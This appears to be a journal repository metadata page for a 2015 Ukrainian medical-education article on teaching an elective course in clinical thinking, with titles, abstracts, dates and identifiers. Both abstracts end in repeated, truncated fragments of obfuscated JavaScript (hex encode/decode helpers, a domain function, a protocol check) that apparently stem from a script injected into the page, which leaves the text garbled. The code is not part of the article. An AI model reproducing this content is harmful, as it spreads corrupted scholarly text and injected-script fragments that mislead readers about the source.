FEATURES OF TEACHING OF THE ELECTIVE COURSE “FUNDAMENTALS OF CLINICAL THINKING” IN THE PROPEDEUTICS OF INTERNAL MEDICINE DEPARTMENT
Наукові журнали Тернопільського державного медичного університету імені І.Я.Горбачевського
Переглянути архів ІнформаціяПоле | Співвідношення | |
Title |
FEATURES OF TEACHING OF THE ELECTIVE COURSE “FUNDAMENTALS OF CLINICAL THINKING” IN THE PROPEDEUTICS OF INTERNAL MEDICINE DEPARTMENT
ОСОБЛИВОСТІ ВИКЛАДАННЯ КУРСУ ЗА ВИБОРОМ “ОСНОВИ КЛІНІЧНОГО МИСЛЕННЯ” НА КАФЕДРІ ПРОПЕДЕВТИКИ ВНУТРІШНЬОЇ МЕДИЦИНИ |
|
Creator |
Zozuliak, N. V.; Тернопільський державний медичнрй університет імені І.Я. Горбачевського
|
|
Subject |
—
— — — — — |
|
Description |
At the beginning of the third year of study students have the opportunity to choose an elective course “Fundamentals of clinical thinking”. After finishing of the elective course the student becomes able to interview and examine the patient, assess patient’s additional methods of investigations, analyze the data according to the particular algorithm and make differential diagnosis of diseases. For better learning it was offered to use “method of the project” based on independent work. Student independently performs examining of the patients and analyzing the data, and the teacher acts as an “observer”. As a result, the subject is learned by students much more efficiently, and classes are interesting for students.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
На початку третього курсу студентам надається можливість обрати курс за вибором “Основи клінічного мислення”. Після опанування елективного курсу студент має оволодіти вмінням опитувати та обстежувати хворого, оцінювати дані додаткових методів обстежень, аналізувати дані за певним алгоритмом та здійснювати диференціальну діагностику захворювань. Для кращого засвоєння матеріалу запропоновано використовувати “метод проектів”, що ґрунтується на самостійній роботі студента. Тобто студент самостійно виконує обстеження хворих та аналіз отриманих даних, а викладач виступає у ролі “спостерігача”. У результаті предмет засвоюється набагато ефективніше, а заняття проходить цікавіше для студентів.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e |
|
Publisher |
Ternopil State Medical University
|
|
Contributor |
—
— |
|
Date |
2015-12-14
|
|
Type |
info:eu-repo/semantics/article
info:eu-repo/semantics/publishedVersion — — — |
|
Format |
application/pdf
|
|
Identifier |
http://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/5313
10.11603/me.v0i4.5313 |
|
Source |
Medical Education; № 4 (2015)
Медична освіта; № 4 (2015) 2414-5998 1681-2751 10.11603/me.v0i4 |
|
Language |
ukr
|
|
Relation |
http://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/5313/4882
|
|
Coverage |
—
— — — — — |
|
Rights |
##submission.copyrightStatement##
|
|